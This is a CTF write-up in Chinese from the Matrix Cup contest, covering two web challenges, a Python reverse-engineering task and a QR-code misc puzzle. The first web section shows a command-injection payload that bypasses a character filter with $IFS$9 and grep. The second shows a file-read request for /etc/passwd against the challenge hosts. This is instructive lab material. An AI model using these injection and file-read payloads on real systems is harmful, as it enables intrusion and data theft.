矩阵杯漏洞安全闯关赛

本次自己参加了矩阵杯战队攻防对抗赛，太菜了，本来可以解出5道题，有一道web题没注意看以为是考xss，结果看大佬wp发现考点ssrf+gopher协议写webshell

web easyweb

访问flag.php

下载加密的代码.zip

          <?php
          if (isset($_GET['id']) && floatval($_GET['id']) !== '1' && $_GET['id'] == 1) 
          {
              echo 'welcome,admin';
              $_SESSION['admin'] = True;
          } 
          else 
          {
            die('flag?');
          }
          ?>

          <?php
         if ($_SESSION['admin']) 
         {
           if(isset($_POST['code']))
           {
               if(preg_match("/(ls|c|a|t| |f|i|n|d')/", $_POST['code'])==1)
                   echo 'no!';
               elseif(preg_match("/[@#%^&*()|/?><']/",$_POST['code'])==1)
                   echo 'no!';
            else
                system($_POST['code']);
           }
         }
         ?>

floatval绕过

if (isset($_GET['id']) && floatval($_GET['id']) !== '1' && $_GET['id'] == 1) 

floatval 函数用于获取变量的浮点值，但是floatval在遇到字符时会截断后面的部分，比如-,+,空格等，所以可以构造id=1abc来满足第一个if条件

正则绕过

<?php
         if ($_SESSION['admin']) 
         {
           if(isset($_POST['code']))
           {
               if(preg_match("/(ls|c|a|t| |f|i|n|d')/", $_POST['code'])==1)
                   echo 'no!';
               elseif(preg_match("/[@#%^&*()|/?><']/",$_POST['code'])==1)
                   echo 'no!';
            else
                system($_POST['code']);
           }
         }
         ?>

我们需要绕过的字符包括：ls、c、a、t、空格、f、i、n、d、@、#、%、^、&、*、(、)、|、/、>、<、?、'。

空格绕过 $IFS$9

使用grep -r 获取flag

POST /index.php?id=1abc HTTP/1.1
Host: web-2875746145.challenge.xctf.org.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Origin: http://web-2875746145.challenge.xctf.org.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://web-2875746145.challenge.xctf.org.cn/index.php?id=1abc
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 34

code=grep$IFS$9-r$IFS$9{

welcome,admin 
7l8g:flag{W6pLVqO6MK9kOXGLeOiHIIOGixKQFaud} 
index.php: { index.php: { index.php: { index.php: {

web where

提示访问/look

http://web-5447d7e612.challenge.xctf.org.cn/look?file=/etc/passwd

存在文件读取漏洞

直接跑字典，拿到flag

打卡下班flag{ARddmuVNaiayGI7vHjrYrQlJ7gvJFnvL}

reverse packpy

查壳 使用了upx加壳

使用upx脱壳报错

这种提示可能是upx头信息错误

https://blog.darkskytechnology.com/repairing-a-damaged-upx-header-169e49cb5d0

https://forum.butian.net/share/1868

使用010editor修改

讲upx? 修改为 UPX!

修改后的成功脱壳

PyInstaller反编译

将脱壳后的文件，使用IDA打开

从伪代码中看到了.py,并且从题目packpy来看，就是python逆向相关，常规使用PyInstaller打包二进制文件

使用pyinstxtractor提取pyc

https://github.com/extremecoders-re/pyinstxtractor

成功反编译出来文件

uncompyle6反编译pyc

注意：uncompyle6的版本要跟pyc文件python版本一样

uncompyle6 D:Python381_extractedpackpy.pyc

import base58, zlib, marshal
try:
    scrambled_code_string = b'X1XehTQeZCsb4WSLBJBYZMjovD1x1E5wjTHh2w3j8dDxbscVa6HLEBSUTPEMsAcerwYASTaXFsCmWb1RxBfwBd6RmyePv3AevTDUiFAvV1GB94eURvtdrpYez7dF1egrwVz3EcQjHxXrpLXs2APE4MS93sMsgMgDrTFCNwTkPba31Aa2FeCSMu151LvEpwiPq5hvaZQPaY2s4pBpH16gGDoVb9MEvLn5J4cP23rEfV7EzNXMgqLUKF82mH1v7yjVCtYQhR8RprKCCtD3bekHjBH2AwES4QythgjVetUNDRpN5gfeJ99UYbZn1oRQHVmiu1sLjpq2mMm8tTuiZgfMfsktf5Suz2w8DgRX4qBKQijnuU4Jou9hduLeudXkZ85oWx9SU7MCE6gjsvy1u57VYw33vckJU6XGGZgZvSqKGR5oQKJf8MPNZi1dF8yF9MkwDdEq59jFsRUJDv7kNwig8XiuBXvmtJPV963thXCFQWQe8XGSu7kJqeRaBX1pkkQ4goJpgTLDHR1LW7bGcZ7m13KzW5mVmJHax81XLis774FjwWpApmTVuiGC2TQr2RcyUTkhGgC8R4bQiXgCsqZMoWyafcSmjdZsHmE6WgNAqPQmEg9FyjpK5f2XC1DkzuyHan5YceeEDMxKUJgJrmNcdGxB7281EyeriyuWNJVH2rVNhio6yoG'
    exec(marshal.loads(zlib.decompress(base58.b58decode(scrambled_code_string))))
except:
    pass

dis反编译可查看代码

import base58
import zlib
import marshal
import dis

# 原始编码的字符串
scrambled_code_string = b'X1XehTQeZCsb4WSLBJBYZMjovD1x1E5wjTHh2w3j8dDxbscVa6HLEBSUTPEMsAcerwYASTaXFsCmWb1RxBfwBd6RmyePv3AevTDUiFAvV1GB94eURvtdrpYez7dF1egrwVz3EcQjHxXrpLXs2APE4MS93sMsgMgDrTFCNwTkPba31Aa2FeCSMu151LvEpwiPq5hvaZQPaY2s4pBpH16gGDoVb9MEvLn5J4cP23rEfV7EzNXMgqLUKF82mH1v7yjVCtYQhR8RprKCCtD3bekHjBH2AwES4QythgjVetUNDRpN5gfeJ99UYbZn1oRQHVmiu1sLjpq2mMm8tTuiZgfMfsktf5Suz2w8DgRX4qBKQijnuU4Jou9hduLeudXkZ85oWx9SU7MCE6gjsvy1u57VYw33vckJU6XGGZgZvSqKGR5oQKJf8MPNZi1dF8yF9MkwDdEq59jFsRUJDv7kNwig8XiuBXvmtJPV963thXCFQWQe8XGSu7kJqeRaBX1pkkQ4goJpgTLDHR1LW7bGcZ7m13KzW5mVmJHax81XLis774FjwWpApmTVuiGC2TQr2RcyUTkhGgC8R4bQiXgCsqZMoWyafcSmjdZsHmE6WgNAqPQmEg9FyjpK5f2XC1DkzuyHan5YceeEDMxKUJgJrmNcdGxB7281EyeriyuWNJVH2rVNhio6yoG'
# 解码 Base58
decoded_data = base58.b58decode(scrambled_code_string)
# 解压缩 zlib
decompressed_data = zlib.decompress(decoded_data)
# 反序列化 marshal
code_object = marshal.loads(decompressed_data)
# 执行代码
#exec(code_object)

dis.dis(code_object)

 1           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (None)
              4 IMPORT_NAME              0 (random)
              6 STORE_NAME               0 (random)

  3           8 LOAD_CONST               2 (b'x18xfaxaddxedxabxadx9dxe5xc0xadxfaxf9x0bexf9xe5xade6xf9xfdx88xf9x9dxe5x9cxe5x9dexc3))x0fxff')
             10 STORE_NAME               1 (encdata)

  5          12 LOAD_CONST               3 (<code object generate_key at 0x00000221AB28CBE0, file "run.py", line 5>)
             14 LOAD_CONST               4 ('generate_key')
             16 MAKE_FUNCTION            0
             18 STORE_NAME               2 (generate_key)

 12          20 LOAD_CONST               5 (<code object encrypt at 0x00000221AB28C030, file "run.py", line 12>)
             22 LOAD_CONST               6 ('encrypt')
             24 MAKE_FUNCTION            0
             26 STORE_NAME               3 (encrypt)

 19          28 SETUP_FINALLY           58 (to 88)

 20          30 LOAD_NAME                4 (input)
             32 LOAD_CONST               7 ('input your flag:')
             34 CALL_FUNCTION            1
             36 STORE_NAME               5 (flag)

 21          38 LOAD_NAME                2 (generate_key)
             40 LOAD_NAME                6 (len)
             42 LOAD_NAME                5 (flag)
             44 CALL_FUNCTION            1
             46 CALL_FUNCTION            1
             48 STORE_NAME               7 (key)

 22          50 LOAD_NAME                5 (flag)
             52 LOAD_METHOD              8 (encode)
             54 CALL_METHOD              0
             56 STORE_NAME               9 (data)

 23          58 LOAD_NAME                3 (encrypt)
             60 LOAD_NAME                9 (data)
             62 LOAD_NAME                7 (key)
             64 CALL_FUNCTION            2
             66 STORE_NAME              10 (encrypted_data)

 25          68 LOAD_NAME               10 (encrypted_data)
             70 LOAD_NAME                1 (encdata)
             72 COMPARE_OP               2 (==)
             74 POP_JUMP_IF_FALSE       84

 26          76 LOAD_NAME               11 (print)
             78 LOAD_CONST               8 ('good')
             80 CALL_FUNCTION            1
             82 POP_TOP
        >>   84 POP_BLOCK
             86 JUMP_FORWARD            12 (to 100)

 27     >>   88 POP_TOP
             90 POP_TOP
             92 POP_TOP

 28          94 POP_EXCEPT
             96 JUMP_FORWARD             2 (to 100)
             98 END_FINALLY
        >>  100 LOAD_CONST               1 (None)
            102 RETURN_VALUE

Disassembly of <code object generate_key at 0x00000221AB28CBE0, file "run.py", line 5>:
  7           0 LOAD_GLOBAL              0 (list)
              2 LOAD_GLOBAL              1 (range)
              4 LOAD_CONST               1 (256)
              6 CALL_FUNCTION            1
              8 CALL_FUNCTION            1
             10 STORE_FAST               1 (key)

  8          12 LOAD_GLOBAL              2 (random)
             14 LOAD_METHOD              3 (seed)
             16 LOAD_FAST                0 (seed_value)
             18 CALL_METHOD              1
             20 POP_TOP

  9          22 LOAD_GLOBAL              2 (random)
             24 LOAD_METHOD              4 (shuffle)
             26 LOAD_FAST                1 (key)
             28 CALL_METHOD              1
             30 POP_TOP

 10          32 LOAD_GLOBAL              5 (bytes)
             34 LOAD_FAST                1 (key)
             36 CALL_FUNCTION            1
             38 RETURN_VALUE

Disassembly of <code object encrypt at 0x00000221AB28C030, file "run.py", line 12>:
 14           0 LOAD_GLOBAL              0 (bytearray)
              2 CALL_FUNCTION            0
              4 STORE_FAST               2 (encrypted)

 15           6 LOAD_FAST                0 (data)
              8 GET_ITER
        >>   10 FOR_ITER                22 (to 34)
             12 STORE_FAST               3 (byte)

 16          14 LOAD_FAST                2 (encrypted)
             16 LOAD_METHOD              1 (append)
             18 LOAD_FAST                1 (key)
             20 LOAD_FAST                3 (byte)
             22 BINARY_SUBSCR
             24 LOAD_CONST               1 (95)
             26 BINARY_XOR
             28 CALL_METHOD              1
             30 POP_TOP
             32 JUMP_ABSOLUTE           10

 17     >>   34 LOAD_GLOBAL              2 (bytes)
             36 LOAD_FAST                2 (encrypted)
             38 CALL_FUNCTION            1
             40 RETURN_VALUE

根据字节码内容实现获取flag脚本

这段代码实现了一个简单的加密过程。让我们逐步分析：

1. 1. 首先，导入了random模块。

2. 2. 然后，定义了一个二进制数据encdata，可能是作为某种密钥或者其他数据使用。

3. 3. 接着，定义了两个函数：

• • generate_key函数：生成一个包含256个数的列表，并将其打乱，然后将列表转换为字节串返回。

• • encrypt函数：对传入的数据进行加密，其中使用了上面生成的密钥进行异或操作。

4. 4. 在主代码部分，用户被提示输入一个标志(flag)，然后通过generate_key函数生成一个密钥(key)。

5. 5. 随后，将输入的标志(flag)编码为字节串(data)。

6. 6. 再然后，调用encrypt函数对数据进行加密，得到加密后的数据(encrypted_data)。

7. 7. 接下来，将加密后的数据与之前定义的二进制数据encdata进行比较，如果相等，则打印"good"。

8. 8. 最后，无论加密是否成功，都会返回None。

这段代码的主要目的似乎是进行简单的数据加密，并通过比较结果来确认加密是否成功。

根据encdata加密值获取flag

import random

# 加密数据
encdata = b'x18xfaxaddxedxabxadx9dxe5xc0xadxfaxf9x0bexf9xe5xade6xf9xfdx88xf9x9dxe5x9cxe5x9dexc3))x0fxff'

# 生成密钥的函数
def generate_key(seed_value):
    # 生成一个包含 0 到 255 的随机排列的列表作为密钥
    key = list(range(256))
    random.seed(seed_value)
    random.shuffle(key)
    return bytes(key)

# 解密函数
def decrypt(encrypted_data, key):
    decrypted = bytearray()
    for byte in encrypted_data:
        # 使用密钥对数据进行异或运算并附加到解密结果中
        decrypted.append(key.index(byte ^ 95))
    return bytes(decrypted)

# 已知的加密数据格式
known_data_format = b'flag{'

# 遍历所有可能的种子值
for seed_value in range(2**32):
    key = generate_key(seed_value)
    decrypted_data = decrypt(encdata, key)
    # 检查解密后的数据是否与已知的数据格式匹配
    if decrypted_data.startswith(known_data_format):
        print("找到种子值:", seed_value)
        print("解密后的数据:", decrypted_data)
        break

找到种子值: 35
解密后的数据: b'flag{mar3hal_Is_3asy_t0_r3v3rse!!@}'

misc 两极反转

两极反转，黑白不分 奇变偶不变，横变竖不变 (PS:或许你要非常熟悉二维码的结构！

将图片转换为数组

# -*- coding:UTF-8 -*- #
import cv2
import numpy as np


def split_qrcode_into_blocks(image_path, block_size):
    # 使用OpenCV读取图像并转为灰度图
    image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
    if image is None:
        raise FileNotFoundError(f"The image at {image_path} was not found.")

    # 获取图像的宽度和高度
    height, width = image.shape


    # # 检查块大小是否能整除图像的尺寸
    if width % block_size != 0 or height % block_size != 0:
        raise ValueError(f"Block size {block_size} does not divide evenly into the QR code dimensions.")
    
    # 计算能够整除图像尺寸的最大块大小
    block_size = min(height, width) // block_size

    # 初始化二维数组，用于存储每个块的颜色值（0或1）
    blocks_array = np.zeros((height // block_size, width // block_size), dtype=np.uint8)

    # 遍历每个块，获取正中间的颜色值，并转换为0或1
    for i in range(0, height, block_size):
        for j in range(0, width, block_size):
            # 计算块正中间像素的坐标
            mid_i = i + block_size // 2
            mid_j = j + block_size // 2

            # 获取该像素的灰度值，并转换为0或1（假设一个阈值，比如128）
            pixel_value = image[mid_i, mid_j]
            blocks_array[i // block_size, j // block_size] = 0 if pixel_value < 128 else 1

    return blocks_array


# 使用函数
try:
    blocks_2d_array = split_qrcode_into_blocks('2.png', 29)  # 假设每个块的大小为29x29
    #print(blocks_2d_array)
    for i in blocks_2d_array:
        print(str(i).replace(" ",",").replace("]","],"))

    # print(blocks_2d_array[27][28])
except (FileNotFoundError, ValueError) as e:
    print(e)

二维码中红线中间是需要进行黑白替换的，也就是数组中9-21行

#  将获取到的二维码数组的9-21行替换
array = [
[0,0,1,0,1,1,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,1,0,0,1],
[1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,0,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,1,1,1],
[1,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,0,0],
[0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,1,1,1,0,1,1],
[1,0,1,1,1,0,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,1],
[1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1],
[0,0,1,1,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0],
[0,1,1,1,1,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,1,0,0,0,1,0],
[1,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0],
[1,0,0,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1],
[1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,1,1,0,1,0,0],
[1,0,1,1,0,1,1,0,1,0,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1],
    # ...（其他行保持不变）
]

# 替换特定行中的0和1
for i in [0, 2, 4, 6, 8, 10, 12]:
    array[i] = [1 if x == 0 else 0 for x in array[i]]

# 打印替换后的数组（仅显示前14行以节省空间）
for row in array[:14]:
    print(str(row).replace(", ",","))

将黑白反转替换的数组，填入原来的数组覆盖9-21行，并保存为新二维码图片

from PIL import Image
import numpy as np

# 假设你已经有了一个二维数组，这里使用你提供的数组片段作为例子
# 注意：为了简单起见，这里我只使用了数组的一部分，并且假设它是完整图像的一个片段
# 在实际应用中，你需要确保二维数组是完整的图像数据
array_2d = np.array([[0,0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,0,1,1,1,0,0,0,0,0,0,0],
[0,1,1,1,1,1,0,1,1,1,0,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0],
[0,1,0,0,0,1,0,1,1,1,0,0,0,1,0,0,0,1,1,0,1,1,0,1,0,0,0,1,0],
[0,1,0,0,0,1,0,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,0,0,1,0],
[0,1,0,0,0,1,0,1,1,1,1,1,0,0,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0],
[0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0],
[0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1],
[1,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,1,0,1,0,0,1,1,1,0,1,1,0],
[1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,0,0,1,0,1,0,0],
[1,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,1,1,1,0,1,1,1,0,0,0],
[1,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,0,0],
[1,1,0,1,1,0,0,1,1,0,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,0,1,0,0],
[1,0,1,1,1,0,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,1],
[0,0,1,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0],
[0,0,1,1,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0],
[1,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,1,0,0,1,1,1,0,1],
[1,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0],
[0,1,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,0],
[1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,1,1,0,1,0,0],
[0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0],
[1,1,1,1,1,1,1,1,0,0,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,0,1,1,1],
[0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0],
[0,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,0,1,1,1,1],
[0,1,0,0,0,1,0,1,0,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,0,1,1,0,0],
[0,1,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,1,1,1],
[0,1,0,0,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0],
[0,1,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1],
[0,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0],])

# 确保数组的数据类型是uint8，并且值在0-255范围内
# 如果值不是在这个范围内，你可能需要缩放它们
array_2d = (array_2d * 255).astype(np.uint8)

# 将二维数组转换为图像对象
# 注意：如果你的数组是一个图像片段而不是完整的图像，你可能需要调整它的形状以匹配完整的图像尺寸
image = Image.fromarray(array_2d, 'L')  # 'L' 表示灰度模式

# 保存图像到文件
image.save('grayscale_image.png')

使用工具识别

例题如下

链接：https://pan.baidu.com/s/1GR4MCRAxAjQXboHbedN5JQ?pwd=vouc 提取码：vouc

原文始发于微信公众号（安全逐梦人）：矩阵杯战队攻防对抗赛writeup by 四五队